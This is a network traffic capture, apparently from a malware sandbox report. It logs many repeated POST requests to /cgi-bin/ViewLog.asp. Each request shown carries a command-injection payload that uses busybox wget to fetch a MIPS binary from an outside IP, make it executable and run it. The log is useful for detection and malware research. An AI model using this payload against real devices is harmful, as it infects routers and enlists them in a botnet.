                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              484192.168.2.145015094.120.30.1708080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:43.877543926 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              485192.168.2.145652894.120.0.2068080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:44.137376070 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              486192.168.2.144825285.69.26.538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:45.065913916 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.634238005 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:46.786165953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.058176041 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.665874004 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.881609917 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.592797041 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              487192.168.2.143328431.136.250.1918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:45.067287922 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.666258097 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:46.818157911 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.314080000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.921878099 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.137566090 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.592794895 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              488192.168.2.144999685.88.156.168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:45.142632008 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              489192.168.2.144366894.121.75.1548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:45.378495932 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              490192.168.2.145045494.120.162.438080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:45.471684933 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              491192.168.2.144444294.120.209.1678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:45.643788099 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              492192.168.2.143695694.120.244.68080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:45.834225893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              493192.168.2.143922694.122.22.2108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:45.876210928 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              494192.168.2.145519694.121.184.628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.059075117 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              495192.168.2.144925831.136.121.618080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:46.059494019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:46.626183033 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.746115923 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
